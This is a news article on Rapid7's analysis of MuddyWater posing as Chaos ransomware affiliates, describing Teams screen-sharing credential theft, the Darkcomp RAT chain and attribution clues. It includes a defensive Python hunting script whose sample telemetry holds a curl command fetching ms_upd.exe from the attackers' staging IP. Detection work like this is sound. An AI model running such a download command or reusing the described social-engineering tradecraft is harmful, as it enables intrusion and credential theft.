
MuddyWater Exploits Microsoft Teams in False Flag Ransomware Attacks


"The campaign was characterized by a high-touch social engineering phase conducted via Microsoft Teams, where the attackers utilized interactive screen-sharing to harvest credentials and manipulate multi-factor authentication (MFA)," Rapid7 said in a report shared with The Hacker News.

MuddyWater's false-flag: state-backed actors posing as Chaos ransomware affiliates

Rapid7’s analysis, shared with The Hacker News in early May 2026, attributes a recent intrusion to the Iranian state-sponsored cluster known as MuddyWater (also tracked as Mango Sandstorm, Seedworm, and Static Kitten). The operation presented itself as a typical ransomware-as-a-service (RaaS) intrusion tied to the Chaos gang, but investigators concluded it functioned as a targeted, state-backed campaign that used extortion tradecraft to obscure its strategic objectives.

Check Point had previously described similar behavior: in March it observed MuddyWater operators working through the cybercriminal ecosystem to mask strategic Iranian aims, including participation in affiliate programs and use of criminal ransomware brands such as Qilin. The same pattern — crimecraft as cover for state objectives — is central to Rapid7’s assessment of this intrusion.

Microsoft Teams social engineering and credential capture

Rapid7 reports the intrusion began with external chat requests via Microsoft Teams. Attackers initiated interactive screen-sharing sessions, impersonating support personnel, and used those sessions to harvest credentials and manipulate multi-factor authentication. While Chaos-affiliated incidents have used Teams for vishing and mail flooding, Rapid7’s incident shows the technique applied in a high-touch, human-led compromise that then pivoted to technical persistence.

During live sessions, the threat actor executed discovery commands, accessed VPN configuration files, and instructed users to put credentials into local text files. In at least one case the attacker deployed AnyDesk to extend access. Rapid7 also noted the use of Microsoft Quick Assist-like workflows in the broader Chaos playbook.

Malware chain and persistence: ms_upd.exe, Darkcomp (game.exe), and RAT behavior

Rapid7 mapped a multi-stage infection chain beginning with an executable downloaded over RDP: ms_upd.exe (aka Stagecomp). The executable gathers system information, contacts a command-and-control (C2) server, and drops subsequent payloads including game.exe (aka Darkcomp), WebView2Loader.dll, and visualwincomp.txt.

  • game.exe (Darkcomp) is a bespoke remote access trojan (RAT) masquerading as a Microsoft WebView2 application and derived from the Microsoft WebView2APISample project.
  • WebView2Loader.dll is a legitimate WebView2 DLL used to embed web content; visualwincomp.txt contains an encrypted configuration the RAT uses to locate C2 servers.
  • The RAT polls its C2 every 60 seconds and can execute commands or PowerShell scripts, perform file operations, and spawn interactive cmd.exe or PowerShell shells.

Rapid7 also observed attackers establishing long-term persistence via remote management tools such as DWAgent and AnyDesk rather than executing file encryption. The absence of file encryption — despite Chaos artifacts — suggested the ransomware element served as obfuscation or a secondary lever, rather than the primary objective.

Attribution signals: shared tooling and a recurring code-signing certificate

Investigators tied the intrusion to MuddyWater in part through a reused code-signing certificate attributed to "Donald Gay," which signed ms_upd.exe. Rapid7 notes that the same certificate has previously been used by the threat cluster to sign other malware, including a CastleLoader downloader called Fakeset. Additional telemetry connects the actor to CastleRAT and Tsundere, and to past MuddyWater operations dating to 2020 and 2023 that involved loaders and destructive ransomware variants.

Rapid7 and other firms (Ctrl-Alt-Intel, Broadcom, Check Point, JUMPSEC) have documented a broader shift: state-aligned operators are increasingly reusing off-the-shelf criminal tools and RaaS brands such as Chaos (active since early 2025 and advertised on forums like RAMP and RehubCom) to complicate attribution.

What this means for technologists, policymakers, and affected enterprises

Technologists and security teams will watch Teams-based social engineering and remote-access tooling closely: Rapid7’s case highlights interactive screen-sharing as a credential-exfiltration vector and flags DWAgent and AnyDesk as persistence mechanisms to detect. Indicators cited in the report include the ms_upd.exe download via curl from 172.86.126[.]208 and the reuse of the "Donald Gay" code-signing certificate.
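The indicators above, together with the RAT behaviour described earlier (the ms_upd.exe stager, the dropped game.exe payload, and a fixed 60-second C2 polling interval), can be turned into a small hunting script. The example below is added here for illustration and is not code from Rapid7 or from the report; the process and network events it scans are constructed sample telemetry, the C2 addresses 203.0.113.7 and 198.51.100.20 are documentation-range placeholders, and the on-disk binary names assumed for AnyDesk and DWAgent (anydesk.exe, dwagent.exe) are assumptions. The staging IP, the signer name and the payload filenames are the ones cited in the report.

```python
"""Hunt constructed Windows telemetry for the indicators cited in the Rapid7 report."""
from collections import defaultdict
from datetime import datetime
from pathlib import PureWindowsPath

# Indicators cited in the report (the IP is written defanged on the page).
STAGING_IP = "172.86.126.208"
SUSPECT_SIGNER = "Donald Gay"
DROPPED_FILES = {"ms_upd.exe", "game.exe", "webview2loader.dll", "visualwincomp.txt"}
# Assumption: on-disk binary names of the remote-management tools the report names.
REMOTE_TOOLS = {"anydesk.exe", "dwagent.exe"}
BEACON_INTERVAL_S = 60   # Darkcomp polls its C2 every 60 seconds per Rapid7
BEACON_TOLERANCE_S = 5   # allow a little jitter and clock skew

# Constructed sample process-creation events (not from the report).
PROCESS_EVENTS = [
    {"ts": "2026-05-01T09:12:03", "host": "WS01", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o C:\Users\Public\ms_upd.exe http://172.86.126.208/ms_upd.exe",
     "signer": "Microsoft Windows"},
    {"ts": "2026-05-01T09:12:41", "host": "WS01", "image": r"C:\Users\Public\ms_upd.exe",
     "cmdline": "ms_upd.exe", "signer": "Donald Gay"},
    {"ts": "2026-05-01T09:13:10", "host": "WS01", "image": r"C:\Users\Public\game.exe",
     "cmdline": "game.exe", "signer": ""},
    {"ts": "2026-05-01T09:30:00", "host": "WS01", "image": r"C:\Program Files\AnyDesk\AnyDesk.exe",
     "cmdline": "AnyDesk.exe --service", "signer": ""},
    {"ts": "2026-05-01T09:31:00", "host": "WS01", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe", "signer": "Microsoft Windows"},
]

# Constructed outbound-connection events: game.exe beaconing once a minute, plus browser noise.
NETWORK_EVENTS = [
    {"ts": t, "host": "WS01", "image": r"C:\Users\Public\game.exe", "dst": "203.0.113.7", "dport": 443}
    for t in ("2026-05-01T09:13:12", "2026-05-01T09:14:12", "2026-05-01T09:15:13",
              "2026-05-01T09:16:11", "2026-05-01T09:17:12")
] + [
    {"ts": t, "host": "WS01", "image": r"C:\Program Files\Browser\browser.exe", "dst": "198.51.100.20", "dport": 443}
    for t in ("2026-05-01T09:13:20", "2026-05-01T09:13:25", "2026-05-01T09:14:50")
]


def _basename(image: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return PureWindowsPath(image).name.lower()


def match_process_iocs(events):
    """Return (timestamp, rule, detail) hits for the report's process-level indicators."""
    hits = []
    for e in events:
        name = _basename(e["image"])
        cmd = e.get("cmdline", "")
        if STAGING_IP in cmd and "curl" in cmd.lower():
            hits.append((e["ts"], "curl-download-from-staging-ip", cmd))
        if name in DROPPED_FILES:
            hits.append((e["ts"], "known-dropped-payload", e["image"]))
        if e.get("signer") == SUSPECT_SIGNER:
            hits.append((e["ts"], "reused-signing-cert", f"{name} signed by {SUSPECT_SIGNER}"))
        if name in REMOTE_TOOLS:
            hits.append((e["ts"], "remote-management-tool", e["image"]))
    return hits


def find_beacons(events, interval=BEACON_INTERVAL_S, tol=BEACON_TOLERANCE_S, min_hits=3):
    """Group connections by (host, image, dst, port) and flag flows whose gaps
    between consecutive connections cluster around the RAT's polling interval."""
    by_flow = defaultdict(list)
    for e in events:
        key = (e["host"], _basename(e["image"]), e["dst"], e["dport"])
        by_flow[key].append(datetime.fromisoformat(e["ts"]))
    beacons = []
    for (host, image, dst, dport), times in by_flow.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        periodic = [g for g in gaps if abs(g - interval) <= tol]
        # Require several periodic gaps and that they dominate the flow.
        if len(periodic) >= min_hits and len(periodic) >= 0.8 * len(gaps):
            beacons.append({"host": host, "image": image, "dst": dst, "dport": dport,
                            "connections": len(times), "mean_gap_s": sum(gaps) / len(gaps)})
    return beacons


if __name__ == "__main__":
    for ts, rule, detail in match_process_iocs(PROCESS_EVENTS):
        print(f"{ts} {rule}: {detail}")
    for b in find_beacons(NETWORK_EVENTS):
        print(f"beacon candidate: {b}")
```

The process rules are exact-match hunts and will only catch the artifacts named in the report; the beacon check is the more durable signal, because a renamed RAT with the same 60-second polling loop still produces the same connection cadence. Tune `BEACON_TOLERANCE_S` and `min_hits` against your own proxy or EDR data before alerting on it.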

Policymakers and regulators should note the blending of state objectives with criminal extortion playbooks: Check Point and Rapid7 both underscore how RaaS frameworks and affiliate programs can provide deniability and tactical cover for strategic operations, complicating response and attribution timelines.

Affected enterprises — particularly those in sectors already targeted by Chaos affiliates, including construction, manufacturing, and business services — should be aware that Chaos claimed 36 victims on its data leak site as of late March 2026, most in the U.S. Organizations dealing with VPN configurations and remote-support workflows should prioritize monitoring for credential capture during screen-sharing and unexpected deployments of remote management tools.

These findings underscore a growing convergence: state-aligned actors are borrowing criminal infrastructure and extortion narratives to obscure intent, while preserving human-led interaction techniques that can bypass automated defenses. The key open question Rapid7 leaves on the table is operational: when a ransomware artifact appears, will defenders focus on short-term impact or follow the persistence breadcrumbs — DWAgent, AnyDesk, bespoke RATs, and code-signing reuse — that reveal the true, strategic objective?

Original report — The Hacker News